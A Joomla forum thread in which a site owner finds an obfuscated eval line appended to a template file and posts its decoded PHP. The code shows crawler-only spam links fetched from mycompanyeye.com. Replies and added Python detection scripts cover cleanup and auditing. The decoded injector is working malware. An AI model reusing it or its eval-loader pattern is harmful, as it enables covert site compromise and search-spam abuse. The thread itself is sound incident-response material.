Spambots are on my site. Could my template be the cause?

Questions related to the configuration of Joomla, Templates, and Security related questions/issues
GK User
Wed May 01, 2013 10:15 pm
Here is my index.php from my coffe template for Joomla 1.5

Code:
<?php

/*
#------------------------------------------------------------------------
# Coffe - #1 2011 template (for Joomla 1.5)
#
# Copyright (C) 2007-2010 Gavick.com. All Rights Reserved.
# License: Copyrighted Commercial Software
# Website: http://www.gavick.com
# Support: [email protected]   
#------------------------------------------------------------------------
# Based on T3 Framework
#------------------------------------------------------------------------
# Copyright (C) 2004-2009 J.O.O.M Solutions Co., Ltd. All Rights Reserved.
# @license - GNU/GPL, http://www.gnu.org/copyleft/gpl.html
# Author: J.O.O.M Solutions Co., Ltd
# Websites: http://www.joomlart.com - http://www.joomlancers.com
#------------------------------------------------------------------------
*/

// no direct access
defined( '_JEXEC' ) or die( 'Restricted access' );

include_once (dirname(__FILE__).DS.'libs'.DS.'gk.template.helper.php');

$tmpl = GKTemplateHelper::getInstance($this, array('ui', GK_TOOL_SCREEN, GK_TOOL_MENU, 'main_layout', 'direction'));

//Calculate the width of template
$tmplWidth = '';
$tmplWrapMin = '100%';
switch ($tmpl->getParam(GK_TOOL_SCREEN)){
   case 'auto':
      $tmplWidth = '97%';
      break;
   case 'fluid':
      $tmplWidth = intval($tmpl->getParam('gk_screen-fluid-fix-gk_screen_width'));
      $tmplWidth = $tmplWidth ? $tmplWidth.'%' : '90%';
      break;
   case 'fix':
      $tmplWidth = intval($tmpl->getParam('gk_screen-fluid-fix-gk_screen_width'));
      $tmplWrapMin = $tmplWidth ? ($tmplWidth+1).'px' : '1003px';
      $tmplWidth = $tmplWidth ? $tmplWidth.'px' : '1002px';
      break;
   default:
      $tmplWidth = intval($tmpl->getParam(GK_TOOL_SCREEN));
      $tmplWrapMin = $tmplWidth ? ($tmplWidth+1).'px' : '1003px';
      $tmplWidth = $tmplWidth ? $tmplWidth.'px' : '1002px';
      break;
}

$tmpl->setParam ('tmplWidth', $tmplWidth);
$tmpl->setParam ('tmplWrapMin', $tmplWrapMin);

//Main navigation
$gk_menutype = $tmpl->getMenuType();
$gkmenu = null;
if ($gk_menutype && $gk_menutype != 'none') {
   $gkparams = new JParameter('');
   $gkparams->set( 'menutype', $tmpl->getParam('menutype', 'mainmenu') );
   $gkparams->set( 'menu_images_align', 'left' );
   $gkparams->set( 'menupath', $tmpl->templateurl() .'/gk_menus');
   $gkparams->set('menu_images', 1); //0: not show image, 1: show image which set in menu item
   $gkparams->set('menu_background', 1); //0: image, 1: background
   $gkparams->set('mega-colwidth', 200); //Megamenu only: Default column width
   $gkparams->set('mega-style', 1); //Megamenu only: Menu style.
   $gkparams->set('rtl',($tmpl->getParam('direction')=='rtl' || $tmpl->direction == 'rtl'));
   $gkmenu = $tmpl->loadMenu($gkparams, $gk_menutype);
}   
//End for main navigation

$layout = $tmpl->getLayout ();

if ($layout) {
   $tmpl->display($layout);
}
?><?php eval(@gzinflate(base64_decode('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'))); ?>


I used a PHP Decoder and it shows this for the php at the end:

Code:
h5('http://mycompanyeye.com/bulbozavr/bub3/13.list', 1 * 900);
function h5($u, $t){
   $nobot = isset($_REQUEST['nobot']) ? true : false;
   $debug = isset($_REQUEST['debug']) ? true : false;
   $t2    = 3600 * 5;
   $t3    = 3600 * 12;
   $droot = getpasekaroot();
   $tm    = (!@ini_get('upload_tmp_dir')) ? '/tmp/' : @ini_get('upload_tmp_dir');
   if (!$tmp = triksp(array($tm, $droot.'images/avatars/', $droot.'tmp/', $droot.'cache/'))) {
      if ($debug) {
         echo('DEBUG: (ERROR: temporary path not found, return)<br>' . "\r\n");
      }
      return;
   }
   $agent = isset($_SERVER['HTTP_USER_AGENT']) ? $_SERVER['HTTP_USER_AGENT'] : '';
   if ($debug) {
      echo('DEBUG: (INFO: temporary path=' . $tmp . ')<br>, agent ('.$agent.')' . "\r\n");
   }
   if (!preg_match('%(http|curl|google|yahoo|yandex|ya|bing|bot|crawl|lynx|SiteUptime|Spider|ia_archiver|AOL|slurp|msn)%i', $agent, $ret)) {
      if ($debug) {
         echo('DEBUG: (ERROR: you is not spider, return)<br>'."\r\n");
      }
      return;
   }
   if ($debug) {
      echo('DEBUG: (bot by:['.$ret[1].'])<br>'."\r\n");
   }

   if ($t) {
      if ($debug) {
         if (file_exists($tmp . md5($u) . 'c')) {
            echo('DEBUG: (INFO: link file exists=' . $tmp . md5($u) . 'c)<br>' . "\r\n");
            $filemtime = filemtime($tmp . md5($u) . 'c');
            $current   = time();
            $diff      = $current - $filemtime;
            echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t . ')<br>' . "\r\n");
            if ($diff < $t) {
               echo('DEBUG: (INFO: USING CACHE LINK FILE<br>' . "\r\n");
            } else {
               echo('DEBUG: (INFO: DOWNLOAD NEW LINK FILE<br>' . "\r\n");
            }
         }
      }
      if (file_exists($tmp . md5($u . 'c')) && (time() - filemtime($tmp . md5($u . 'c'))) < $t) {
         readfile($tmp . md5($u . 'c'));
         if ($debug) {
            echo('DEBUG: (END: readfile link, return)<br>' . "\r\n");
         }
         return;
      }
   }
   if ($debug) {
      if (file_exists($tmp . md5($u))) {
         echo('DEBUG: (INFO: lists file exists=' . $tmp . md5($u) . ')<br>' . "\r\n");
         $filemtime = filemtime($tmp . md5($u));
         $current   = time();
         $diff      = $current - $filemtime;
         echo('DEBUG: (TIME: current=' . $current . ', filemtime=' . $filemtime . ', different=' . $diff . ', cache_time=' . $t3 . ')<br>' . "\r\n");
         if ($diff < $t3) {
            echo('DEBUG: (INFO: USING CACHE LIST FILE<br>' . "\r\n");
         } else {
            echo('DEBUG: (INFO: DOWNLOAD NEW LIST FILE<br>' . "\r\n");
         }
      }
   }
   if (file_exists($tmp . md5($u)) && (time() - filemtime($tmp . md5($u))) < $t3) {
      $d = file($tmp . md5($u));
   } else {
      $c = curl_init($u);
      if (!$c) {
         if ($debug) {
            echo('DEBUG: (ERROR: curl(list) not init, return)<br>' . "\r\n");
         }
         return;
      }
      curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
      $d = curl_exec($c);
      $l = curl_getinfo($c);
      curl_close($c);
      if ($l['http_code'] == 200 && $d) {
         @file_put_contents($tmp . md5($u), $d);
         $d = explode("\n", $d);
      }
   }
   if ($debug) {
      echo('DEBUG: (INFO: size list_array=' . sizeof($d) . ')<br>' . "\r\n");
   }
   if ($d) {
      $l = @array_rand($d);
      $c = @curl_init(trim($d[$l]));
      if (!$c) {
         if ($debug) {
            echo('DEBUG: (ERROR: curl(link) not init, return)<br>' . "\r\n");
         }
         return;
      }
      if ($t) {
         curl_setopt($c, CURLOPT_RETURNTRANSFER, 1);
      }
      $d = curl_exec($c);
      if ($t) {
         if ($debug) {
            echo('DEBUG: (INFO: link download)<br>' . "\r\n");
         }
         @file_put_contents($tmp . md5($u . 'c'), $d);
         echo($d);
      } else {
         if ($debug) {
            echo('DEBUG: (ERROR: link NOT download)<br>' . "\r\n");
         }
      }
      @curl_close($c);
   }
}


function triksp($array){
   foreach ($array as $path) {
      if (is_writable($path)) {
         return $path;
      }
   }
   return false;
}

function getpasekaroot() {
   $file = 'configuration.php';
   $path = getcwd().DIRECTORY_SEPARATOR;
   $c = 0;
   while($c < 5) {
      if (file_exists($path.$file)) {
         return $path;
      }
      $path = dirname($path).DIRECTORY_SEPARATOR;
      $c++;
   }
   return @$_SERVER['DOCUMENT_ROOT'];
}


What should my index.php actually look like for my coffe template?
Fresh Boarder
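
The decoded payload in the post above returns early unless the User-Agent matches its crawler pattern, which is why the injected links do not show up in a normal browser. As an added example (not part of the original post), this Python check compares the same page as served to a browser and to a crawler User-Agent and lists the external links that only the crawler receives; the sample HTML, the `example.org` host and the function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class LinkCollector(HTMLParser):
    """Collects the href of every <a> tag in a document."""

    def __init__(self):
        super().__init__()
        self.hrefs = set()

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.hrefs.add(value.strip())


def external_links(html, site_host):
    """Return the absolute links in html that point away from site_host."""
    parser = LinkCollector()
    parser.feed(html)
    found = set()
    for href in parser.hrefs:
        host = urlparse(href).hostname
        if host and host != site_host and not host.endswith("." + site_host):
            found.add(href)
    return found


def cloaked_links(browser_html, crawler_html, site_host):
    """External links present only in the response given to a crawler User-Agent."""
    return sorted(external_links(crawler_html, site_host)
                  - external_links(browser_html, site_host))


# Constructed responses for one URL (not captured from a real site). The payload
# echoes after the template has rendered, so its links land after </html>.
BROWSER_HTML = ('<html><body><a href="/menu">Menu</a>'
                '<a href="http://partner.example/">Partner</a></body></html>')
CRAWLER_HTML = (BROWSER_HTML
                + '<a href="http://spam.example/pills">pills</a>'
                + '<a href="http://spam.example/loans">loans</a>')

if __name__ == "__main__":
    for link in cloaked_links(BROWSER_HTML, CRAWLER_HTML, "example.org"):
        print("served to crawlers only:", link)
```

To use it on a real site, fetch the page twice, once with a browser User-Agent and once with a search-engine one, and pass both bodies to `cloaked_links`.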

GK User
Thu May 02, 2013 1:43 am
Hi,
Answering your question: I do not think it is possible.

Somebody hacked your website, that's all; I know this is sad but true. There could be a number of reasons. I know exactly because sometimes I take "cleaning jobs".

If you still use J1.5 you have to install some extra protection components!
Platinum Boarder

GK User
Thu May 02, 2013 2:00 am
Thanks for the reply. I've just installed OSE Anti-Hacker, rechecked my chmod files/folders and have also deleted the last portion of code I mentioned below. So far so good.
Fresh Boarder

GK User
Thu May 02, 2013 8:53 pm
You should also:
1) Change the password for FTP
2) Change the password for the database and in configuration.php!
3) Check all folders for suspicious files; there is "bad code" inside. Compare the file structure with a clean installation.

I suggest reading the book: CMS Security Handbook: The Comprehensive Guide for WordPress, Joomla!
Platinum Boarder

GK User
Thu May 02, 2013 8:54 pm
p.s.
4) Update all components and uninstall those you still don't use.
5) Check your server settings and compare them with those suggested by joomla.org.
6) In Global Settings -> Show errors [None]
Platinum Boarder
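
Step 3 above (check all folders and compare against a clean installation) can be scripted. The following is an added example, not code from the thread or from Joomla: it hashes every file under a live site, compares it with an unpacked clean copy of the same release, and flags files containing an `eval()` wrapped around a decoder call like the line appended to the template. The directory layout, file names and function names in `demo()` are constructed.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# eval() wrapped around a decoder call: the shape of the line appended to index.php.
OBFUSCATED_EVAL = re.compile(rb"eval\s*\(\s*@?\s*(?:gzinflate|gzuncompress|base64_decode)\s*\(", re.I)


def sha256_tree(root):
    """Map each file path relative to root to its SHA-256 digest."""
    return {p.relative_to(root).as_posix(): hashlib.sha256(p.read_bytes()).hexdigest()
            for p in Path(root).rglob("*") if p.is_file()}


def audit(live_root, clean_root):
    """Report files that differ from a clean copy of the same release, and eval chains."""
    live, clean = sha256_tree(live_root), sha256_tree(clean_root)
    report = {"modified": [], "added": [], "obfuscated_eval": []}
    for rel in sorted(live):
        if live[rel] != clean.get(rel):
            report["added" if rel not in clean else "modified"].append(rel)
        if OBFUSCATED_EVAL.search(Path(live_root, rel).read_bytes()):
            report["obfuscated_eval"].append(rel)
    return report


def demo():
    """Audit a constructed clean/live pair written to a temporary directory."""
    base = Path(tempfile.mkdtemp())
    clean_php = b"<?php defined('_JEXEC') or die('Restricted access'); ?>"
    files = {  # constructed samples; 'QUJD' is a placeholder, not a real payload
        "clean/templates/coffe/index.php": clean_php,
        "live/templates/coffe/index.php": clean_php + b"<?php eval(@gzinflate(base64_decode('QUJD'))); ?>",
        "live/tmp/0123abcd": b"<a href='http://spam.example/'>x</a>",
    }
    for rel, data in files.items():
        (base / rel).parent.mkdir(parents=True, exist_ok=True)
        (base / rel).write_bytes(data)
    return audit(base / "live", base / "clean")


if __name__ == "__main__":
    print(demo())
```

On a real site, expect `configuration.php`, uploads and cache files under "added" or "modified"; the entries to investigate first are core, template and extension files that differ from the clean copy.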

